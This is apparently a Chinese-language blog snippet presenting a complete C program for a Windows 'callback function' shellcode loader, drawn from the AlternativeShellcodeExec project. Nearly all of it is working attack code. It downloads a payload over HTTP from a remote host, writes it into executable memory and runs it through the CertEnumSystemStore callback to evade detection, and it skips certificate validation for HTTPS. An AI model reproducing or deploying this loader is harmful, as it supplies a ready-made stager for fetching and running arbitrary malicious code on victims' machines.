回调函数加载器

是github项目AlternativeShellcodeExec中提到的一些函数可以用来执行shellcode
项目里面还有很多函数可以利用，因为是在本地线程执行shellcode的，所以这里只贴出其中一个完整的利用代码
#include <windows.h>
#include <stdio.h>
#include <wincrypt.h>
#include <WinInet.h>

#pragma comment(lib, "WinInet.lib")
// Requires Crypt32.lib
// 需要在链接器 -> 输入 -> 附加依赖项 中添加如下库
/* 
kernel32.lib
user32.lib
gdi32.lib
winspool.lib
comdlg32.lib
advapi32.lib
shell32.lib
ole32.lib
oleaut32.lib
uuid.lib
odbc32.lib
odbccp32.lib
Crypt32.lib
*/


// 定义结构体
typedef struct {
    char* shellcode;
    int size;
} SHELLCODO, * PSHELLCODE;

BOOL downloadShellcode(LPCWSTR url, int port, LPCWSTR payloadPath, BOOL isEncrypted, PSHELLCODE pShellcode);


int main() {
    SHELLCODO shellcode = { 0 };
    BOOL s = downloadShellcode(L"192.168.1.5", 80, L"/calc.bin", FALSE, &shellcode);

    LPVOID addr = ::VirtualAlloc(NULL, shellcode.size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    ::RtlMoveMemory(addr, shellcode.shellcode, shellcode.size);

    ::CertEnumSystemStore(CERT_SYSTEM_STORE_CURRENT_USER, NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE)addr);
}


// 下载shellcode
BOOL downloadShellcode(LPCWSTR url, int port, LPCWSTR payloadPath, BOOL isEncrypted, PSHELLCODE pShellcode) {

    HINTERNET hInternet = InternetOpen(0, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    if (hInternet == NULL) {
        printf("[-] Internet open error.\n");
        return FALSE;
    }

    HINTERNET hHttpSession = InternetConnect(hInternet,
        url, port,
        NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    if (hHttpSession == NULL) {
        printf("handle is null\n");
        return FALSE;
    }

    HINTERNET hHttpRequest;
    //HTTP
    if (port == 80)
    {
        hHttpRequest = HttpOpenRequest(hHttpSession,
            L"GET", payloadPath,
            NULL, L"", NULL, INTERNET_FLAG_NO_CACHE_WRITE, 0);
    }
    // https
    else
    {
        hHttpRequest = HttpOpenRequest(hHttpSession,
            L"GET", payloadPath,
            NULL, L"", NULL,
            INTERNET_FLAG_SECURE | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_NO_COOKIES | INTERNET_FLAG_NO_CACHE_WRITE, 0);
    }

    if (hHttpRequest == NULL) {
        printf("hHttpRequest is null\n");
        return FALSE;
    }

    BOOL status = HttpSendRequest(hHttpRequest, NULL, 0, NULL, 0);

    // 获取响应大小
    WCHAR buffer[32] = { 0 };
    DWORD bufLen = sizeof(buffer);
    HttpQueryInfo(hHttpRequest, HTTP_QUERY_CONTENT_LENGTH, buffer, &bufLen, 0);

    DWORD fileSize = (DWORD)_wtoi(buffer);

    // 读取文件内容
    char* content = (char*)malloc(fileSize);
    DWORD length = 0;
    ZeroMemory(content, fileSize);
    if (InternetReadFile(hHttpRequest, content, fileSize, &length) == FALSE) {
        printf("write data to memory error.\n");
        return FALSE;
    }

    char* exec = (char*)VirtualAlloc(0, fileSize, MEM_COMMIT, PAGE_READWRITE);
    memcpy(exec, content, fileSize);

    pShellcode->shellcode = exec;
    pShellcode->size = fileSize;

    return TRUE;
}